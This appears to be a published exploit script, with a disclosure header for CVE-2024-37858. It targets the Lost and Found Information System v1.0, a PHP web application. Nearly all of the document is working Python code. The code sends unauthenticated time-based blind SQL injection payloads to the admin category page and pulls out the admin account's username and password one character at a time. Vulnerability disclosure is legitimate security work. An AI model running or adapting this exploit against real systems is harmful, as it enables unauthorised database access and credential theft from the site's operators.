# Exploit Title: Unauthenticated Blind Time-Based SQL Injection Exploit - Lost and Found Information System
# Exploit Author: Amit Roy (Rezur / AR0x7)
# Date: June 07, 2024
# Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip
# Tested on: Kali Linux, Apache, Mysql
# Version: v1.0
# Exploit Description:
# Lost and Found Information System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a Blind SQL Injection attack.
# CVE : CVE-2024-37858import requests,string,sys,argparse
r = requests.Session()
proxies = {'http': 'http://127.0.0.1:8080'}
admin_path = "/php-lfis/admin/index.php"
createCategory_path = "/php-lfis/classes/Master.php"
def char_extract(rhost, payload):
params = {"page": "categories/manage_category", "id": payload}
response = r.get(rhost+admin_path, params=params)
if response.elapsed.total_seconds() > 1:
return True
else:
return False
def sqli(rhost, column):
charset = string.printable
output_length = 200
output = ""
for i in range(output_length):
for char in charset:
# Extracts the credentials of user with id=1, admin by default
payload = "13371337' or if((char(%s)=(select substring(%s,%s,1) from users where id=1)),sleep(1),1)-- -" % (ord(str(char)),str(column),str(i+1))
sys.stdout.write(f"\r[*] Extracting: {output}\r")
if char_extract(rhost, payload):
output += char
break
elif char == '~' and not char_extract(rhost, payload):
print("[*] Extracting:",output)
return output
def argsetup():
about = 'Unauthenticated Blind Time-Based SQL Injection Exploit - Lost and Found Information System (https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html)'
parser = argparse.ArgumentParser(description=about)
parser.add_argument('-t', '--target', help='Target ip address or hostname. Example : "http://localhost"', required=True)
args = parser.parse_args()
return args
def main():
args = argsetup()
rhost = args.target
print(sqli(rhost, 'username'),':',sqli(rhost, 'password'))
if __name__ == "__main__":
main()